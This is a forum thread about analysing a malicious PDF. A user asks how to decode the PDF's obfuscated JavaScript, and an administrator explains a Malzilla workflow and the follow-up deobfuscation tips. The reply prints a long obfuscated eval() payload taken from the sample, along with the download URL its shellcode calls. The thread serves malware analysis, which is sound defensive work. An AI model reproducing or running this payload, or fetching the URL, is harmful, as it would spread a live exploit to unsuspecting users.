Author Topic: problem analyze malicious pdf file (contain app.)  (Read 3667 times)

0 Members and 1 Guest are viewing this topic.

November 25, 2009, 09:53:31 am
Read 3667 times

d3t0n4t0r

  • Jr. Member

  • Offline
  • **

  • 13
Hello,

I've stumbled upon a website that host malicious pdf. I've tried decoding the pdf and there is no hassle on that. However, on the JS part, I wasn't be able to decode on modified spidermonkey js as I got error regarding app function. I've tried several method by making my own function that actually run a print function and etc, but with no result.

I would like to ask favours and pointers on how can i proceed in getting eval log from spidermonkey js.
The malicious pdf is at the post attachment, with password: infected

Thank you in advanced

November 25, 2009, 11:56:49 am
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
using Malzilla :

-replace

Code: [Select]
app.rAiDs74Nu6 = viB7XF4GK;
e2comxCBqv = app.setTimeOut("app.rAiDs74Nu6()", 10);

by

Code: [Select]
eval(Yyap('ezi#dyt7ZE8dQu#=#Aoz6("*f5656*f5656*f5656*f9UVY*f664Y*f33X0*f19Y0*f1998*fVU66*fV756*fVYUZ*fV194*fUUVX*fUUUU*f1Y2U*fWU5V*fVUVU*f35VU*fV6ZU*f0U35*f57U6*f0U35*f3VV2*fVU96*fVUVY*f35VU*fY096*f3812*fV8Z8*f9296*fVU88*fVUVU*fZZ33*fY0VY*f2212*f3488*f92V8*fVU8U*fVUVU*fZZ33*fY0V2*fXZ12*f894U*f927W*fVU9W*fVUVU*fZZ33*fY0V6*f9912*f9U78*f921U*fVU6Y*fVUVU*fZZ33*fY0UU*f7V12*f9Z03*f9242*fVU70*fVUVU*fZZ33*fZUUY*fW23U*f0Z7X*f3384*fU2ZZ*fV193*fVUVV*fY8VU*f0Z33*f35XY*fVYZZ*fVV14*f35Y3*fU2YZ*f92Y0*fVU35*fVUVU*f12YU*fU4W0*f0UX9*f2192*fVUVU*f33VU*fU6ZZ*f7Z35*f7U3X*f33YU*fXUZZ*f8912*fVUVU*fYUVU*fZZ35*f14UY*fY3VW*fYZ35*f92U2*fVU1V*fVUVU*fZZVX*f71XU*fY6VU*fX808*f711Z*fVYZU*f1Z02*fVUVU*f0Z89*f35XU*fV6ZZ*fVV14*f35Y3*fU2YZ*fZU92*fVUVU*f14VU*fY2V1*fZZVX*fWXXY*fYX65*f89YX*fXU0Z*fYXYU*fZZ35*f14U6*fY3VZ*fYZ35*f92U2*fVUXX*fVUVU*fVU14*f0Z89*f35XU*fV2ZZ*fVW14*f35Y3*fU2YZ*fUU92*fVUVU*f14VU*f3589*fUUZZ*fVV14*f35Y3*fU2YZ*fVU92*fVUVU*fZVVU*fYWY5*f9VVX*f9VVX*f9VVX*f9VVX*f963X*fY4VY*f35YX*f9W64*fYW81*f9U89*f35YZ*f3596*fV207*fY735*fY0V6*f0X35*f35W6*fU80Y*fVX02*fY08X*f0035*fVXXU*fWX8X*fZ373*f57ZV*f7XVX*fWXY0*fV980*fUU48*f8WW4*fV20Y*f787V*fVXV7*fZU8W*f8V95*f88W5*f0ZY8*fY49Z*f9535*fY435*fVXXY*f1067*fV635*f35Z5*fU6Y4*f67VX*fVY35*fVX35*fY87Z*f7WY7*fVUV2*f8Y92*f8988*fYZ89*fZ6YW*fZ9Z7*fVUZ8*f2531*f2925*f7U6Z*f377U*f3U3U*f273Y*f2338*f7V34*f3U36*f7U3W*f3W25*f7U29*f7U2Z*f2134*f297V*f2931*f316U*f346W*f6421")@'));
- run the script and you'll get the shellcode

-url in shellcode is
Code: [Select]
bookrave.com/tmp/z/ex.php?h=ex5
http://www.virustotal.com/analisis/caf731d52d1e8e7996f85fc89bd345577479e3a6a20f1a4651bcdaeeb426ed6c-1259119437
Ruining the bad guy's day

November 28, 2009, 06:50:58 pm
Reply #2

d3t0n4t0r

  • Jr. Member

  • Offline
  • **

  • 13
Thanks for the help.
I've go through the code and found out that I'm just confused as the code itself.
Really appreciate the help

Do you have some tips on handling this kind of obfuscation? or there is no way other than go through the code and understand every component it do?

November 28, 2009, 08:39:29 pm
Reply #3

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335

or there is no way other than go through the code and understand every component it do?

Many scripts can only be analyzed by Malzilla /Spidermonkey if you modify the code.
A  completely automated decoding without modifications works only in rare cases.
In order to modify the code you have to understand the logic behind it.
It's not so difficult with some experience. Obfuscation techniques are often similiar.
If you have some experience, then you look at the code and get an idea how it works quickly.
It's merely a matter of practice.
Ruining the bad guy's day